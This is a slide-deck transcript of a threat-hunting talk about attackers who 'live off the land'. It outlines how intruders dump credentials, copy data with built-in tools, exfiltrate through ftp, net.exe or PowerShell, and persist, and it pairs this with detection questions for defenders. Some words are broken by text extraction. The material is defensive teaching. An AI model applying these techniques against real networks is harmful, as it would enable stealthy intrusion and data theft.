Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin Falck
-
Upload
north-texas-chapter-of-the-issa -
Category
Presentations & Public Speaking
-
view
98 -
download
0
Transcript of Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin Falck
©2014 Bit9. All Rights Reserved
Advanced Threat Hun/ng: Iden%fy and Track Zero-‐Day A3acks Infiltra%ng Your Organiza%on Jus/n Falck, Technical Product Manager – Carbon Black Bit9 + Carbon Black July 16th, 2015
Background Threat Landscape Advanced Threats • What are they? • Zero-‐Days • Why Advanced Threats might not be what you think they are • Living off the Land (“Outsider-‐Insider”) Hun/ng • What do you hunt? • How do you hunt? • RelaQonships MaTer!
Wrap-‐Up & Takeaways
Agenda
Quick Background Check
www.linkedin.com/in/jus/nfalck [email protected]
2007 – 2013: Central Intelligence Agency
2013 – 2015: Goldman Sachs Threat Management Center -‐ Irving, TX
2015 – Present: Bit9 + Carbon Black Technical Product Manager -‐ CB
The Evolving Threat Landscape
Criminal Enterprises • Broad-‐based and targeted aTacks • Financially moQvated • Geang more sophisQcated
Hac/vists • Targeted and destrucQve aTacks • Unpredictable moQvaQons • Generally less sophisQcated
Na/on-‐States • Targeted and mulQ-‐stage aTacks • MoQvated by informaQon and IP • Highly sophisQcated, limitless resources
Cyber Terrorism • Targeted and highly visible aTacks • Financial, destrucQve, inQmidaQng • Varied sophisQcaQon
Proof of Effec/veness
Endless Stream of Data Breaches
Source: InformaQon is BeauQful, www.informaQonisbeauQful.net, January 2015
DON’T OVERCOMPLICATE THE THREAT
THREAT MODEL: 1: OPPORTUNISTIC 2: NOT
Opportunis=c threats sell our computers. Goal: breadth of access.
“Advanced” threats sell our data. Goal: precision of access.
Tradi/onal Defenses Were Designed for Opp. AZacks OPP
ORT
UNISTIC
ADVA
NCE
D
Goal for aTacker is to compromise as few endpoints as possible
Goal for aTacker is to compromise as many endpoints as possible
Hosts C
omprom
ised
Time
Hosts C
omprom
ised
Time
DETECTION THRESHOLD
DETECTION THRESHOLD
Signature available
Signature available (if ever)
“Zero-‐Days” “Zero-‐Day” is a term typically used to refer to two different scenarios: • Zero-‐Day Vulnerability: vulnerability is unknown or fix/patch is not yet available – “Non-‐Pub”: exploit an unknown vulnerability
• Zero-‐Day Malware: malware that is unknown; signatures are not available
So how “advanced” are the techniques and payloads being used?
“The (Target) malware utilized is ABSOLUTELY UNSOPHISTICATED and UNINTERESTING” -McAfee
Business Week, March 13, 2014
But once they’re in…
However they get in, we need to find them! Faster detec/on means: • Shorter dwell Qme • Smaller scope for your incident response • Less damage to your business
What do they do once they’re in?
They oben “Live off the Land” (and blend in)
Living off the Land Living Off the Land: the aZacker uses built-‐in tools so there are very few new executables. The aZacker typically needs to do the following:
• Execute code: – Crack/Dump/Guess/Obtain Valid CredenQals
» See this with Backoff POS Malware
• Copy Data: – UQlize tools like robocopy, xcopy, cmd.exe to gather data – UQlize “known good” tools for compression or use scripts
• Exfil Data: – mp.exe, net.exe, Visual Basic script to control IE for POSTing data
• Manipulate: – Download something not malicious but that will trip up detecQon – When Admin logs in, credenQals, keystrokes, etc., are captured and used
• Persist: – Compromise or Add more user and system accounts – Login to backup servers, staging servers, less noQceable parts of your enterprise – Create scheduled jobs that will run and re-‐add accounts, communicate out, etc.
Living off the Land (cont’d) More Things to Consider: • PowerShell is TOO Powerful – Execute from remote URL – Basically anything you would ever want to write code for, you can do with powershell, so as an
adversary, I can really do some damage (powersploit, etc)
• Use Internal C2 Sites: – Use blog comments and/or wiki to give your stuff new commands so there is no outside
communicaQons
• Use Well-‐Known Social Networking and File-‐sharing Sites: – TwiTer (bots) – Dropbox – Google Drive – Facebook – < Insert Social Site Here >
• Find hardcoded creden/als, re-‐use same password across an enterprise, Single-‐Sign-‐On design flaws, etc.
In Other Words…
THEY ARE NOW INSIDERS! BETTER DEFENSE AGAINST THIS… LEADS TO BETTER DEFENSE AGAINST TRUE INSIDERS!
So, back to Hun/ng…
Is Your Environment Like This?
Or This?
What do you Hunt?
Do you know what you’re looking for? Do they have to be advanced? • Are you running vulnerable somware? Is it likely to be compromised? • Have you hardened your systems, have you reduced surface area? • Do you have shared passwords, plain-‐text credenQals, etc? • If you have too much entropy or very few standards, hunQng will be DIFFICULT • Then again, it is rarely “easy”
What do the bad guys need to do? • Execute • Communicate • Grab Data • Steal/Add CredenQals • Persist
Which comes first… Detection or Collection?
By priori=zing collec=on over detec=on you can: (1) HUNT MORE EFFECTIVELY!!! (2) Rapidly find root cause (3) Quickly & confidently reconstruct =melines (4) Accelerate Discovery (determine scope) (5) Benefit from hindsight (evolve)
Some Ideas…
§ Are abnormal user accounts being used?
§ Do windows processes (lsass, svchost, csrss) have strange parents? § Are IE, Acrobat, Word, Notepad, etc., spawning child processes? § Are Office Applica/ons making outbound connec/ons? § Is Java spawning command shells? § Is cmd.exe running as system? § Are user accounts being added locally? § Are thousands of files being modified by a single process? § Is bp or robocopy being used? § Are processes execu/ng that don’t have a .exe or .scr extension?
Back to the Basics…
§ Are you recording every command line used by net.exe and looking for abnormali/es?
§ Are you watching when PowerShell.exe is used? § Are you mapping user account ac/vity to hosts to look for abnormal logins?
§ Are you …. <INSERT LOTS OF STUFF “TO DO” HERE>
“Response is the closest thing we have in IT to dogfigh/ng” -‐ Bruce Schneier, Blackhat 2014 Keynote
Time is the dominant parameter. The pilot
who goes through the OODA cycle in the shortest time prevails
because his opponent is caught
responding to situations that have
already changed. Col John Boyd
1966 Observe Orient Decide Act
Modern IR view
Ac/onable Endpoint Visibility
Tradi/onal IR view
Events + Intelligence With no insight into known bad, how can they pick
the needles out of their data collecQon haystack?
Events + Intelligence + Prevalence Without understanding prevalence, how can they
prioriQze detecQon events to accelerate threat discovery?
Events + Intelligence + Prevalence + Rela/onships Without maintaining the recorded relaQonships, how
do they quickly scope any impacted endpoints and lateral movement?
Events Most organizaQons only have a staQc view of their
business and the data they manage to collect What’s more ac/onable?
? svchost.exe ran svchost.exe was spawned by unsigned binary under abnormal user account and made a network connecQon
The very nature of threat hun%ng requires the human element
In IT, we hire staff to support technology
In security opera%ons, we buy technology to
support staff
Invest in tools that enable humans to make quick decisions
1
2
3
Hun/ng Tips
Collect the RIGHT Data Neslow data and firewall logs can help, but if you aren’t seeing what is execuQng and what is changing on your systems, you will not have as much hunQng success. You need to hunt where the adversaries live!
Incorporate Reputa/on and Classifica/on Informa/on When you’re hunQng, you should not have to spend Qme manually checking the reputaQon of a binary or website, as that greatly slows down your ability to conQnue to the hunt. Being able to quickly say things are known good, known Bad is key, as is the ability to say if it is part of a parQcular campaign or aTack.
Analyze RELATIONSHIPS RelaQonships are key to being able to detect abnormal behavior. Sure, the adversary lives off the land, but they’re sQll going to do unusual things with the exisQng tools available to them.
4 Automate as much as possible! When you know what is normal, you should be able to be alerted when acQvity occurs outside of what is normal. And you should be able to automate this. You should also automate reputaQon and classificaQon informaQon retrieval, and automate discovery.
TAKE-‐AWAYS
Take-‐Aways
Think about how you might hunt advanced threats Can internal tools be used against you? Do you have proper context? Can you tell the FBI whether or not you’ve seen the IOCs they just sent you? Compare current behavior vs. older methods vs. “next-‐gen” Enable your humans to do some hunQng Are you focused on root cause?
Thank You! [email protected] www.linkedin.com/in/jus/nfalck